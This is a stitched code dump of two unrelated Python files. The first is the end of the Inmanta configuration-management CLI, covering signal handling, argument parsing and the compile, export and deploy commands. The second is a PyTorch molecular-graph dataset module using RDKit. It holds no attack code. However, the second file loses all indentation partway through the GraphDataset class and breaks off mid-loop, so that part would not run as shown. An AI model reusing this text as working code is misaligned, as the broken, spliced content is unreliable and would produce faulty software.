    :param shutdown_function: The function that contains the shutdown logic.
    """
    # ensure correct ioloop
    ioloop = IOLoop.current()
    def hard_exit() -> None:
        # Last resort: dump diagnostics and terminate without cleanup.
        context_dump(ioloop)
        sys.stdout.flush()
        # Hard exit, not sys.exit
        # ensure shutdown when the ioloop is stuck
        os._exit(const.EXIT_HARD)
    def handle_signal(signum: signal.Signals, frame: Optional[FrameType]) -> None:
        # force shutdown, even when the ioloop is stuck
        # schedule off the loop
        t = Timer(const.SHUTDOWN_GRACE_HARD, hard_exit)
        t.daemon = True
        t.start()
        # Signal handlers may not touch the loop directly: hand over via
        # add_callback_from_signal.
        ioloop.add_callback_from_signal(safe_shutdown_wrapper, shutdown_function)
    def handle_signal_dump(signum: signal.Signals, frame: Optional[FrameType]) -> None:
        # SIGUSR1 only dumps diagnostics, it does not shut down.
        context_dump(ioloop)
    signal.signal(signal.SIGTERM, handle_signal)
    signal.signal(signal.SIGINT, handle_signal)
    signal.signal(signal.SIGUSR1, handle_signal_dump)
    if rpdb:
        # Optional remote debugger: installs its trap handler when rpdb is importable.
        rpdb.handle_trap()
def safe_shutdown(ioloop: IOLoop, shutdown_function: Callable[[], None]) -> None:
    """
    Schedule a graceful shutdown on the ioloop, backed by a watchdog timer that
    hard-exits the process after const.SHUTDOWN_GRACE_HARD seconds.
    """
    def hard_exit() -> None:
        context_dump(ioloop)
        sys.stdout.flush()
        # Hard exit, not sys.exit
        # ensure shutdown when the ioloop is stuck
        os._exit(const.EXIT_HARD)
    # force shutdown, even when the ioloop is stuck
    # schedule off the loop
    t = Timer(const.SHUTDOWN_GRACE_HARD, hard_exit)
    t.daemon = True
    t.start()
    ioloop.add_callback(safe_shutdown_wrapper, shutdown_function)
async def safe_shutdown_wrapper(shutdown_function: Callable[[], Coroutine[Any, Any, None]]) -> None:
    """
    Wait 10 seconds to gracefully shutdown the instance.
    Afterwards stop the IOLoop
    Wait for 3 seconds to force stop
    """
    future = shutdown_function()
    try:
        # Give the shutdown coroutine a bounded amount of time to finish.
        timeout = IOLoop.current().time() + const.SHUTDOWN_GRACE_IOLOOP
        await gen.with_timeout(timeout, future)
    except TimeoutError:
        # Graceful shutdown took too long: fall through and stop the loop anyway.
        pass
    finally:
        IOLoop.current().stop()
class ExperimentalFeatureFlags:
    """
    Uniformly exposes experimental feature flag config options as command line arguments.
    """

    def __init__(self) -> None:
        # Maps the argparse destination name to the backing config option.
        self.metavar_to_option: Dict[str, Option[bool]] = {}

    def _get_name(self, option: Option[bool]) -> str:
        # Destination name under which the flag is stored on the parsed namespace.
        return f"flag_{option.name}"

    def add(self, option: Option[bool]) -> None:
        """ Add an option to the set of feature flags """
        key = self._get_name(option)
        self.metavar_to_option[key] = option

    def add_arguments(self, parser: argparse.ArgumentParser) -> None:
        """ Add all feature flag options to the argument parser """
        for dest_name, flag_option in self.metavar_to_option.items():
            parser.add_argument(
                f"--experimental-{flag_option.name}",
                dest=dest_name,
                action="store_true",
                default=False,
                help=flag_option.documentation,
            )

    def read_options_to_config(self, options: argparse.Namespace) -> None:
        """
        This method takes input from the commandline parser
        and sets the appropriate feature flag config based
        on the parsed command line arguments

        :param options: the options, as parsed by argparse.
        """
        for dest_name, flag_option in self.metavar_to_option.items():
            if getattr(options, dest_name, False):
                flag_option.set("true")
# Global registry of experimental compiler feature flags, exposed as
# --experimental-* switches on the compile and export commands.
compiler_features = ExperimentalFeatureFlags()
compiler_features.add(compiler.config.feature_compiler_cache)
def compiler_config(parser: argparse.ArgumentParser) -> None:
    """
    Configure the argument parser of the compile command.

    :param parser: The (sub)parser of the compile command.
    """
    parser.add_argument("-e", dest="environment", help="The environment to compile this model for")
    parser.add_argument(
        "-X",
        "--extended-errors",
        dest="errors_subcommand",
        help="Show stack traces for compile errors",
        action="store_true",
        default=False,
    )
    # Connection settings used when the compile interacts with an inmanta server.
    parser.add_argument("--server_address", dest="server", help="The address of the server hosting the environment")
    parser.add_argument("--server_port", dest="port", help="The port of the server hosting the environment")
    parser.add_argument("--username", dest="user", help="The username of the server")
    parser.add_argument("--password", dest="password", help="The password of the server")
    parser.add_argument("--ssl", help="Enable SSL", action="store_true", default=False)
    parser.add_argument("--ssl-ca-cert", dest="ca_cert", help="Certificate authority for SSL")
    parser.add_argument(
        "--export-compile-data",
        dest="export_compile_data",
        help="Export structured json containing compile data such as occurred errors.",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--export-compile-data-file",
        dest="export_compile_data_file",
        help="File to export compile data to. If omitted %s is used." % compiler.config.default_compile_data_file,
    )
    parser.add_argument(
        "--experimental-data-trace",
        dest="datatrace",
        help="Experimental data trace tool useful for debugging",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--experimental-dataflow-graphic",
        dest="dataflow_graphic",
        help="Experimental graphic data flow visualization",
        action="store_true",
        default=False,
    )
    # Register all experimental feature flags as --experimental-* switches.
    compiler_features.add_arguments(parser)
    parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
@command(
    "compile", help_msg="Compile the project to a configuration model", parser_config=compiler_config, require_project=True
)
def compile_project(options: argparse.Namespace) -> None:
    """
    Compile the current project, optionally profiling the compile run.
    Command line options override the corresponding config sections first.
    """
    if options.environment is not None:
        Config.set("config", "environment", options.environment)
    if options.server is not None:
        Config.set("compiler_rest_transport", "host", options.server)
    if options.port is not None:
        Config.set("compiler_rest_transport", "port", options.port)
    if options.user is not None:
        Config.set("compiler_rest_transport", "username", options.user)
    if options.password is not None:
        Config.set("compiler_rest_transport", "password", options.password)
    if options.ssl:
        Config.set("compiler_rest_transport", "ssl", "true")
    if options.ca_cert is not None:
        Config.set("compiler_rest_transport", "ssl-ca-cert-file", options.ca_cert)
    if options.export_compile_data is True:
        Config.set("compiler", "export_compile_data", "true")
    if options.export_compile_data_file is not None:
        Config.set("compiler", "export_compile_data_file", options.export_compile_data_file)
    if options.datatrace is True:
        Config.set("compiler", "datatrace_enable", "true")
    if options.dataflow_graphic is True:
        Config.set("compiler", "dataflow_graphic_enable", "true")
    compiler_features.read_options_to_config(options)
    # Loading the project is required before do_compile() can run.
    module.Project.get(options.main_file)
    if options.profile:
        import cProfile
        import pstats
        cProfile.runctx("do_compile()", globals(), {}, "run.profile")
        p = pstats.Stats("run.profile")
        p.strip_dirs().sort_stats("time").print_stats(20)
    else:
        t1 = time.time()
        do_compile()
        LOGGER.debug("Compile time: %0.03f seconds", time.time() - t1)
@command("list-commands", help_msg="Print out an overview of all commands")
def list_commands(options: argparse.Namespace) -> None:
    """Print the name and help text of every registered command."""
    print("The following commands are available:")
    for cmd, info in Commander.commands().items():
        print(" %s: %s" % (cmd, info["help"]))
def help_parser_config(parser: argparse.ArgumentParser) -> None:
    """Configure the argument parser of the help command."""
    parser.add_argument(
        "subcommand",
        nargs="?",
        default=None,
        help="Output help for a particular subcommand",
    )
@command("help", help_msg="show a help message and exit", parser_config=help_parser_config)
def help_command(options: argparse.Namespace) -> None:
    """Show the general help, or the help of the given subcommand."""
    if options.subcommand is None:
        cmd_parser().print_help()
    else:
        subc = options.subcommand
        parser = cmd_parser()
        # argparse prints the subcommand help and exits the process on "-h".
        parser.parse_args([subc, "-h"])
    sys.exit(0)
@command(
    "modules",
    help_msg="Subcommand to manage modules",
    parser_config=moduletool.ModuleTool.modules_parser_config,
    aliases=["module"],
)
def modules(options: argparse.Namespace) -> None:
    """Dispatch the selected modules subcommand to the ModuleTool."""
    tool = moduletool.ModuleTool()
    tool.execute(options.cmd, options)
@command("project", help_msg="Subcommand to manage the project", parser_config=moduletool.ProjectTool.parser_config)
def project(options: argparse.Namespace) -> None:
    """Dispatch the selected project subcommand to the ProjectTool."""
    tool = moduletool.ProjectTool()
    tool.execute(options.cmd, options)
def deploy_parser_config(parser: argparse.ArgumentParser) -> None:
    """
    Configure the argument parser of the deploy command.

    :param parser: The (sub)parser of the deploy command.
    """
    parser.add_argument("--dry-run", help="Only report changes", action="store_true", dest="dryrun")
    parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
    parser.add_argument(
        "--dashboard",
        dest="dashboard",
        help="Start the dashboard and keep the server running. "
        "The server uses the current project as the source for server recompiles",
        action="store_true",
        default=False,
    )
@command("deploy", help_msg="Deploy with a inmanta all-in-one setup", parser_config=deploy_parser_config, require_project=True)
def deploy(options: argparse.Namespace) -> None:
    """Run an all-in-one (embedded orchestrator) deploy of the current project."""
    module.Project.get(options.main_file)
    from inmanta import deploy as deploy_module
    run = deploy_module.Deploy(options)
    try:
        if not run.setup():
            LOGGER.error("Failed to setup the orchestrator.")
            return
        run.run()
    finally:
        # Always tear down the embedded orchestrator, also on failure.
        run.stop()
def export_parser_config(parser: argparse.ArgumentParser) -> None:
    """
    Configure the argument parser of the export command.

    :param parser: The (sub)parser of the export command.
    """
    parser.add_argument("-g", dest="depgraph", help="Dump the dependency graph", action="store_true")
    parser.add_argument(
        "-j",
        dest="json",
        help="Do not submit to the server but only store the json that would have been " "submitted in the supplied file",
    )
    parser.add_argument("-e", dest="environment", help="The environment to compile this model for")
    parser.add_argument("-d", dest="deploy", help="Trigger a deploy for the exported version", action="store_true")
    parser.add_argument(
        "--full",
        dest="full_deploy",
        help="Make the agents execute a full deploy instead of an incremental deploy. "
        "Should be used together with the -d option",
        action="store_true",
        default=False,
    )
    parser.add_argument("-m", dest="model", help="Also export the complete model", action="store_true", default=False)
    # Connection settings for the server that receives the exported version.
    parser.add_argument("--server_address", dest="server", help="The address of the server to submit the model to")
    parser.add_argument("--server_port", dest="port", help="The port of the server to submit the model to")
    parser.add_argument("--token", dest="token", help="The token to auth to the server")
    parser.add_argument("--ssl", help="Enable SSL", action="store_true", default=False)
    parser.add_argument("--ssl-ca-cert", dest="ca_cert", help="Certificate authority for SSL")
    parser.add_argument(
        "-X",
        "--extended-errors",
        dest="errors_subcommand",
        help="Show stack traces for compile errors",
        action="store_true",
        default=False,
    )
    parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
    parser.add_argument(
        "--metadata",
        dest="metadata",
        help="JSON metadata why this compile happened. If a non-json string is "
        "passed it is used as the 'message' attribute in the metadata.",
        default=None,
    )
    parser.add_argument(
        "--model-export",
        dest="model_export",
        help="Export the configuration model to the server as metadata.",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--export-plugin",
        dest="export_plugin",
        help="Only use this export plugin. This option also disables the execution of the plugins listed in "
        "the configuration file in the export setting.",
        default=None,
    )
    parser.add_argument(
        "--export-compile-data",
        dest="export_compile_data",
        help="Export structured json containing compile data such as occurred errors.",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--export-compile-data-file",
        dest="export_compile_data_file",
        help="File to export compile data to. If omitted %s is used." % compiler.config.default_compile_data_file,
    )
    # Register all experimental feature flags as --experimental-* switches.
    compiler_features.add_arguments(parser)
@command("export", help_msg="Export the configuration", parser_config=export_parser_config, require_project=True)
def export(options: argparse.Namespace) -> None:
    """
    Compile the project and export the resulting configuration model version
    to the server, optionally triggering a deploy of the new version.
    """
    if options.environment is not None:
        Config.set("config", "environment", options.environment)
    if options.server is not None:
        Config.set("compiler_rest_transport", "host", options.server)
    if options.port is not None:
        Config.set("compiler_rest_transport", "port", options.port)
    if options.token is not None:
        Config.set("compiler_rest_transport", "token", options.token)
    if options.ssl:
        Config.set("compiler_rest_transport", "ssl", "true")
    if options.ca_cert is not None:
        Config.set("compiler_rest_transport", "ssl-ca-cert-file", options.ca_cert)
    if options.export_compile_data is True:
        Config.set("compiler", "export_compile_data", "true")
    if options.export_compile_data_file is not None:
        Config.set("compiler", "export_compile_data_file", options.export_compile_data_file)
    compiler_features.read_options_to_config(options)
    # try to parse the metadata as json. If a normal string, create json for it.
    if options.metadata is not None and len(options.metadata) > 0:
        try:
            metadata = json.loads(options.metadata)
        except json.decoder.JSONDecodeError:
            metadata = {"message": options.metadata}
    else:
        metadata = {"message": "Manual compile on the CLI by user"}
    # Enrich the compile metadata with user, host and compile type when absent.
    if "cli-user" not in metadata and "USERNAME" in os.environ:
        metadata["cli-user"] = os.environ["USERNAME"]
    if "hostname" not in metadata:
        metadata["hostname"] = socket.gethostname()
    if "type" not in metadata:
        metadata["type"] = "manual"
    module.Project.get(options.main_file)
    from inmanta.export import Exporter  # noqa: H307
    exp = None
    types: Optional[Dict[str, inmanta_type.Type]]
    scopes: Optional[Namespace]
    try:
        (types, scopes) = do_compile()
    except Exception as e:
        # Remember the failure; it is re-raised after the export ran.
        exp = e
        types, scopes = (None, None)
    # Even if the compile failed we might have collected additional data such as unknowns. So
    # continue the export
    export = Exporter(options)
    results = export.run(
        types, scopes, metadata=metadata, model_export=options.model_export, export_plugin=options.export_plugin
    )
    version = results[0]
    if exp is not None:
        raise exp
    if options.model:
        modelexporter = ModelExporter(types)
        with open("testdump.json", "w", encoding="utf-8") as fh:
            print(yaml.dump(modelexporter.export_all()))
            json.dump(modelexporter.export_all(), fh)
    if options.deploy:
        conn = protocol.SyncClient("compiler")
        LOGGER.info("Triggering deploy for version %d" % version)
        tid = cfg_env.get()
        agent_trigger_method = const.AgentTriggerMethod.get_agent_trigger_method(options.full_deploy)
        conn.release_version(tid, version, True, agent_trigger_method)
# Mapping from the -v verbosity count to a python log level; 4 maps to the
# numeric level 2 ("trace", see the -v help text in cmd_parser).
log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG, 4: 2}
def cmd_parser() -> argparse.ArgumentParser:
    """
    Build the top level argument parser, with one subparser per registered command.
    """
    # create the argument compiler
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", action="store_true", dest="profile", help="Profile this run of the program")
    parser.add_argument("-c", "--config", dest="config_file", help="Use this config file", default=None)
    parser.add_argument(
        "--config-dir",
        dest="config_dir",
        help="The directory containing the Inmanta configuration files",
        default="/etc/inmanta/inmanta.d",
    )
    parser.add_argument("--log-file", dest="log_file", help="Path to the logfile")
    parser.add_argument(
        "--log-file-level",
        dest="log_file_level",
        default=2,
        type=int,
        help="Log level for messages going to the logfile: 0=ERROR, 1=WARNING, 2=INFO, 3=DEBUG",
    )
    parser.add_argument("--timed-logs", dest="timed", help="Add timestamps to logs", action="store_true")
    parser.add_argument(
        "-v",
        "--verbose",
        action="count",
        default=0,
        help="Log level for messages going to the console. Default is only errors,"
        "-v warning, -vv info and -vvv debug and -vvvv trace",
    )
    parser.add_argument(
        "--warnings",
        dest="warnings",
        choices=["warn", "ignore", "error"],
        default="warn",
        help="The warning behaviour of the compiler. Must be one of 'warn', 'ignore', 'error'",
    )
    parser.add_argument(
        "-X", "--extended-errors", dest="errors", help="Show stack traces for errors", action="store_true", default=False
    )
    parser.add_argument(
        "--version",
        action="store_true",
        dest="inmanta_version",
        help="Show the version of the installed Inmanta product and the version of its subcomponents",
        default=False,
        required=False,
    )
    subparsers = parser.add_subparsers(title="commands")
    # Register every command collected by the @command decorator as a subcommand.
    for cmd_name, cmd_options in Commander.commands().items():
        cmd_subparser = subparsers.add_parser(cmd_name, help=cmd_options["help"], aliases=cmd_options["aliases"])
        if cmd_options["parser_config"] is not None:
            cmd_options["parser_config"](cmd_subparser)
        cmd_subparser.set_defaults(func=cmd_options["function"])
        cmd_subparser.set_defaults(require_project=cmd_options["require_project"])
    return parser
def print_versions_installed_components_and_exit() -> None:
    """Print the product, compiler and extension versions and exit with code 0."""
    bootloader = InmantaBootloader()
    app_context = bootloader.load_slices()
    product_metadata = app_context.get_product_metadata()
    extension_statuses = app_context.get_extension_statuses()
    if product_metadata.version:
        print(f"{product_metadata.product} ({product_metadata.edition}): {product_metadata.version}")
    else:
        print(f"{product_metadata.product} ({product_metadata.edition}): version unknown")
    print(f"Compiler version: {get_compiler_version()}")
    if extension_statuses:
        print("Extensions:")
        for ext_status in extension_statuses:
            print(f"    * {ext_status.name}: {ext_status.version}")
    else:
        print("Extensions: No extensions found")
    sys.exit(0)
def _is_on_tty() -> bool:
    """Return True when stdout is attached to a terminal or the force-tty env var is set."""
    stdout_is_tty = hasattr(sys.stdout, "isatty") and sys.stdout.isatty()
    return stdout_is_tty or const.ENVIRON_FORCE_TTY in os.environ
def _get_default_stream_handler() -> logging.StreamHandler:
    """Build the INFO-level stdout handler used before the CLI options are parsed."""
    handler = logging.StreamHandler(stream=sys.stdout)
    handler.setLevel(logging.INFO)
    handler.setFormatter(_get_log_formatter_for_stream_handler(timed=False))
    return handler
def _get_watched_file_handler(options: argparse.Namespace) -> logging.handlers.WatchedFileHandler:
    """
    Build a WatchedFileHandler (reopens the file when it is rotated away) for
    options.log_file, at the level given by options.log_file_level.

    :raises Exception: when no logfile path was provided in the options.
    """
    if not options.log_file:
        raise Exception("No logfile was provided.")
    level = _convert_to_log_level(options.log_file_level)
    formatter = logging.Formatter(fmt="%(asctime)s %(levelname)-8s %(name)-10s %(message)s")
    file_handler = logging.handlers.WatchedFileHandler(filename=options.log_file, mode="a+")
    file_handler.setFormatter(formatter)
    file_handler.setLevel(level)
    return file_handler
def _convert_to_log_level(level: int) -> int:
    """Map a verbosity count to a python log level, clamping to the highest verbosity."""
    clamped = min(level, len(log_levels) - 1)
    return log_levels[clamped]
def _get_log_formatter_for_stream_handler(timed: bool) -> logging.Formatter:
    """
    Return the console log formatter: colored output on a tty, plain otherwise.

    :param timed: Whether to prefix every record with a timestamp.
    """
    log_format = "%(asctime)s " if timed else ""
    if _is_on_tty():
        log_format += "%(log_color)s%(name)-25s%(levelname)-8s%(reset)s %(blue)s%(message)s"
        formatter = colorlog.ColoredFormatter(
            log_format,
            datefmt=None,
            reset=True,
            log_colors={"DEBUG": "cyan", "INFO": "green", "WARNING": "yellow", "ERROR": "red", "CRITICAL": "red"},
        )
    else:
        log_format += "%(name)-25s%(levelname)-8s%(message)s"
        formatter = logging.Formatter(fmt=log_format)
    return formatter
def app() -> None:
    """
    Run the compiler: configure logging, parse the command line, load the
    configuration and dispatch to the selected subcommand.
    """
    # Send logs to stdout
    stream_handler = _get_default_stream_handler()
    logging.root.handlers = []
    logging.root.addHandler(stream_handler)
    logging.root.setLevel(0)
    # do an initial load of known config files to build the libdir path
    Config.load_config()
    parser = cmd_parser()
    options, other = parser.parse_known_args()
    options.other = other
    # Log everything to a log_file if logfile is provided
    if options.log_file:
        watched_file_handler = _get_watched_file_handler(options)
        logging.root.addHandler(watched_file_handler)
        logging.root.removeHandler(stream_handler)
    else:
        if options.timed:
            formatter = _get_log_formatter_for_stream_handler(timed=True)
            stream_handler.setFormatter(formatter)
        log_level = _convert_to_log_level(options.verbose)
        stream_handler.setLevel(log_level)
    logging.captureWarnings(True)
    if options.inmanta_version:
        # Prints version information and exits the process.
        print_versions_installed_components_and_exit()
    if options.config_file and not os.path.exists(options.config_file):
        LOGGER.warning("Config file %s doesn't exist", options.config_file)
    # Load the configuration
    Config.load_config(options.config_file, options.config_dir)
    if options.warnings is not None:
        Config.set("warnings", "default", options.warnings)
    config = Config.get()
    assert isinstance(config, ConfigParser)
    WarningsManager.apply_config(config["warnings"] if "warnings" in config else None)
    # start the command
    if not hasattr(options, "func"):
        # show help
        parser.print_usage()
        return
    def report(e: BaseException) -> None:
        # Without -X only a short message is printed; with -X the full stack trace.
        minus_x_set_top_level_command = options.errors
        minus_x_set_subcommand = hasattr(options, "errors_subcommand") and options.errors_subcommand
        if not minus_x_set_top_level_command and not minus_x_set_subcommand:
            if isinstance(e, CompilerException):
                print(e.format_trace(indent="  "), file=sys.stderr)
            else:
                print(str(e), file=sys.stderr)
        else:
            sys.excepthook(*sys.exc_info())
        if isinstance(e, CompilerException):
            from inmanta.compiler.help.explainer import ExplainerFactory
            helpmsg = ExplainerFactory().explain_and_format(e, plain=not _is_on_tty())
            if helpmsg is not None:
                print(helpmsg)
    try:
        options.func(options)
    except ShowUsageException as e:
        print(e.args[0], file=sys.stderr)
        parser.print_usage()
    except CLIException as e:
        report(e)
        sys.exit(e.exitcode)
    except Exception as e:
        report(e)
        sys.exit(1)
    except KeyboardInterrupt as e:
        report(e)
        sys.exit(1)
    sys.exit(0)
# Allow running this module directly as a script.
if __name__ == "__main__":
    app()
| StarcoderdataPython |
154580 | """ PyTorch dataset classes for molecular data. """
import itertools
from typing import Dict, List, Tuple, Union
import numpy as np
import torch
from rdkit import Chem
# noinspection PyUnresolvedReferences
from rdkit.Chem import AllChem, rdmolops, rdPartialCharges, rdForceFieldHelpers, rdchem
from scipy import sparse
from torch.utils.data import Dataset
from conformation.distance_matrix import distmat_to_vec
from conformation.graph_data import Data
def to_one_hot(x: int, vals: Union[List, range]) -> List[int]:
    """
    Return a one-hot vector.

    The result has a 1 at every position where ``vals`` equals ``x`` and 0
    elsewhere (all zeros when ``x`` does not occur in ``vals``). Integers are
    returned instead of booleans for consistency with the hand-built 0/1
    feature lists elsewhere in this module; since bool compares equal to int,
    existing callers are unaffected.

    :param x: Data integer.
    :param vals: List of possible data values.
    :return: One-hot vector as list.
    """
    return [int(x == v) for v in vals]
class TestDataset(Dataset):
    """
    Minimal dataset wrapping an in-memory tensor, with an optional fixed condition
    returned alongside every sample.
    """
    def __init__(self, data: torch.Tensor, condition: torch.Tensor = None):
        super(Dataset, self).__init__()
        self.data = data
        self.condition = condition

    def __len__(self) -> int:
        return len(self.data)

    def __getitem__(self, idx: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:
        item = self.data[idx]
        if self.condition is None:
            return item
        return item, self.condition
class BasicDataset(Dataset):
    """
    Dataset class for loading non-molecular data organized as numpy arrays.
    Each metadata entry supplies the path(s) of torch-loadable sample files.
    """
    def __init__(self, metadata: List[Dict[str, str]], condition: bool = False):
        super(Dataset, self).__init__()
        self.metadata = metadata
        # When True, __getitem__ also loads and returns the per-sample condition.
        self.condition = condition

    def __len__(self) -> int:
        return len(self.metadata)

    def __getitem__(self, idx: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:
        entry = self.metadata[idx]
        sample = torch.load(entry['path'])
        if not self.condition:
            return sample
        return sample, torch.load(entry['condition'])
class MolDataset(Dataset):
    """
    Dataset class for loading atomic pairwise distance information for molecules.
    """
    def __init__(self, metadata: List[Dict[str, str]]):
        """
        :param metadata: List of dicts whose 'path' key points to a distance matrix file.
        """
        super(Dataset, self).__init__()
        self.metadata = metadata
    def __len__(self) -> int:
        return len(self.metadata)
    def __getitem__(self, idx: int) -> torch.Tensor:
        # distmat_to_vec presumably returns (num atoms, flattened distance vector);
        # only the vector is used here -- TODO confirm against distance_matrix module.
        _, data = distmat_to_vec(self.metadata[idx]['path'])
        data = torch.from_numpy(data)
        # noinspection PyTypeChecker
        data = data.type(torch.float32)
        return data
    def __repr__(self) -> str:
        return '{}({})'.format(self.__class__.__name__, len(self))
class GraphDataset(Dataset):
"""
Dataset class for loading molecular graphs and pairwise distance targets.
"""
# noinspection PyUnresolvedReferences
def __init__(self, metadata: List[Dict[str, str]], atom_types: List[int] = None, bond_types: List[float] = None,
target: bool = True, max_path_length: int = 10, atomic_num: bool = True, partial_charge: bool = True,
mmff_atom_types_one_hot: bool = True, valence_types: List[int] = None, valence: bool = True,
aromatic: bool = True, hybridization: bool = True, assign_stereo: bool = True,
charge_types: List[int] = None, formal_charge: bool = True, r_covalent: bool = True,
r_vanderwals: bool = True, default_valence: bool = True, max_ring_size: int = 8,
rings: bool = True, chirality: bool = True, mmff94_atom_types: List[int] = None,
hybridization_types: List[Chem.HybridizationType] = None,
chi_types: List[rdchem.ChiralType] = None, improved_architecture: bool = False, max_atoms: int = 26,
degree_types: List[int] = None, degree: bool = True, num_hydrogen_types: List[int] = None,
num_hydrogen: bool = True, num_radical_electron_types: List[int] = None,
num_radical_electron: bool = True, conjugated: bool = True, bond_type: bool = True,
bond_ring: bool = True, bond_stereo: bool = True, bond_stereo_types: List[int] = None,
shortest_path: bool = True, same_ring: bool = True, autoencoder: bool = False):
"""
Custom dataset for molecular graphs.
:param metadata: Metadata contents.
:param atom_types: List of allowed atomic numbers.
:param bond_types: List of allowed bond types.
:param target: Whether or not to load target data from metadata into Data() object.
:param max_path_length: Maximum shortest path length between any two atoms in a molecule in the dataset.
:param partial_charge: Whether or not to include Gasteiger Charge as a vertex feature.\
:param mmff_atom_types_one_hot: Whether or not to include MMFF94 atom types as vertex features.
:param valence_types: List of allowed total valence numbers.
:param valence: Whether or not to include total valence as a vertex feature.
:param aromatic: Whether or not to include aromaticity as a vertex feature.
:param hybridization: Whether or not to include hybridization as a vertex feature.
:param assign_stereo: Whether or not to include stereochemistry information.
:param charge_types: Formal charge types.
:param formal_charge: Whether or not to include formal charge as a vertex feature.
:param r_covalent: Whether or not to include covalent radius as a vertex feature.
:param r_vanderwals: Whether or not to include vanderwals radius as a vertex feature.
:param default_valence: Whether or not to include default valence as a vertex feature.
:param max_ring_size: Maximum ring size.
:param rings: Whether or not to include ring size as a vertex feature.
:param chirality: Whether or not to include chirality as a vertex feature.
:param mmff94_atom_types: MMFF94 atom types.
:param hybridization_types: Hybridization types.
:param chi_types: Chiral tag types.
:param improved_architecture: Whether or not to use Jonas improved relational architecture.
:param max_atoms: Maximum number of atoms for a given molecule in the dataset (improved_architecture = True)
:param degree_types: Atomic degree types.
:param degree: Whether or not to include degree as a vertex feature.
:param num_hydrogen_types: List of allowed number of H atoms (including neighbors).
:param num_hydrogen: Whether or not to include number of (neighboring) Hs as a vertex feature.
:param num_radical_electron_types: List of allowed number of radical electrons.
:param num_radical_electron: Whether or not to include number of radical electrons as a vertex feature.
:param conjugated: Whether or not to include conjugated as an edge feature.
:param bond_type: Whether or not to include bond type as an edge feature.
:param bond_ring: Whether or not to include bond being in ring as an edge feature.
:param bond_stereo: Whether or not to include bond stereo as an edge feature.
:param bond_stereo_types: List of bond stereo types.
:param shortest_path: Whether or not to include shortest path length as a bond feature.
:param same_ring: Whether or not to include same ring as bond feature.
:param autoencoder: Whether or not to prepare data for autoencoder training.
"""
super(Dataset, self).__init__()
if bond_types is None:
self.bond_types = [0., 1., 1.5, 2., 3.]
else:
self.bond_types = bond_types
if atom_types is None:
self.atom_types = [1, 6, 7, 8, 9]
else:
self.atom_types = atom_types
self.metadata = metadata
self.target = target
self.max_path_length = max_path_length
self.atomic_num = atomic_num
self.partial_charge = partial_charge
if mmff94_atom_types is None:
self.mmff94_atom_types = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 15, 16, 17, 18, 20, 21, 22, 23, 24, 25, 26,
27, 28, 29, 30, 31, 32, 33, 37, 38, 39, 40, 42, 43, 44, 46, 48, 59, 62, 63, 64,
65, 66, 70, 71, 72, 74, 75, 78]
else:
self.mmff94_atom_types = mmff94_atom_types
self.mmff_atom_types_one_hot = mmff_atom_types_one_hot
if valence_types is None:
self.valence_types = [1, 2, 3, 4, 5, 6]
else:
self.valence_types = valence_types
self.valence = valence
self.aromatic = aromatic
if hybridization_types is None:
self.hybridization_types = [Chem.HybridizationType.S,
Chem.HybridizationType.SP,
Chem.HybridizationType.SP2,
Chem.HybridizationType.SP3,
Chem.HybridizationType.SP3D,
Chem.HybridizationType.SP3D2,
Chem.HybridizationType.UNSPECIFIED]
else:
self.hybridization_types = hybridization_types
self.hybridization = hybridization
self.assign_stereo = assign_stereo
if charge_types is None:
self.charge_types = [-1, 0, 1]
else:
self.charge_types = charge_types
self.formal_charge = formal_charge
self.r_covalent = r_covalent
self.r_vanderwals = r_vanderwals
self.default_valence = default_valence
self.max_ring_size = max_ring_size
self.rings = rings
if chi_types is None:
self.chi_types = list(rdchem.ChiralType.values.values())
else:
self.chi_types = chi_types
self.chirality = chirality
self.improved_architecture = improved_architecture
self.max_atoms = max_atoms
if degree_types is None:
self.degree_types = [1, 2, 3, 4]
else:
self.degree_types = degree_types
self.degree = degree
if num_hydrogen_types is None:
self.num_hydrogen_types = [0, 1, 2, 3]
else:
self.num_hydrogen_types = num_hydrogen_types
self.num_hydrogen = num_hydrogen
if num_radical_electron_types is None:
self.num_radical_electron_types = [0, 1, 2]
else:
self.num_radical_electron_types = num_radical_electron_types
self.num_radical_electron = num_radical_electron
self.conjugated = conjugated
self.bond_type = bond_type
self.bond_ring = bond_ring
self.bond_stereo = bond_stereo
if bond_stereo_types is None:
self.bond_stereo_types = list(rdchem.BondStereo.values.values())
else:
self.bond_stereo_types = bond_stereo_types
self.shortest_path = shortest_path
self.same_ring = same_ring
self.autoencoder = autoencoder
def __len__(self) -> int:
return len(self.metadata)
def __getitem__(self, idx) -> Union[Data, Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]]:
"""
Output a data object with node features, edge connectivity, and (optionally) target.
:param idx: Which item to load.
:return: Data() object.
"""
data = Data()
# Molecule from binary
# noinspection PyUnresolvedReferences
mol = Chem.Mol(open(self.metadata[idx]['binary'], "rb").read())
num_atoms = mol.GetNumAtoms()
# Target
if self.target:
# Target: 1-D tensor representing average inter-atomic distance for each edge
target = np.load(self.metadata[idx]['target'])
data.y = torch.tensor(target, dtype=torch.float)
# Compute edge connectivity in COO format corresponding to a complete graph on num_nodes
complete_graph = np.ones([num_atoms, num_atoms]) # Create an auxiliary complete graph
complete_graph = np.triu(complete_graph, k=1) # Compute an upper triangular matrix of the complete graph
complete_graph = sparse.csc_matrix(complete_graph) # Compute a csc style sparse matrix from this graph
row, col = complete_graph.nonzero() # Extract the row and column indices corresponding to non-zero entries
row = torch.tensor(row, dtype=torch.long)
col = torch.tensor(col, dtype=torch.long)
data.edge_index = torch.stack([row, col]) # Edge connectivity in COO format (all possible edges)
# Edge features
edge_features = []
edge_count = 0
for a, b in itertools.combinations(list(np.arange(num_atoms)), 2):
bond_feature = []
bond = mol.GetBondBetweenAtoms(int(a), int(b))
if bond is None:
if self.bond_type:
bond_feature += [1] + [0]*len(self.bond_types)
if self.conjugated:
bond_feature += [0]
if self.bond_ring:
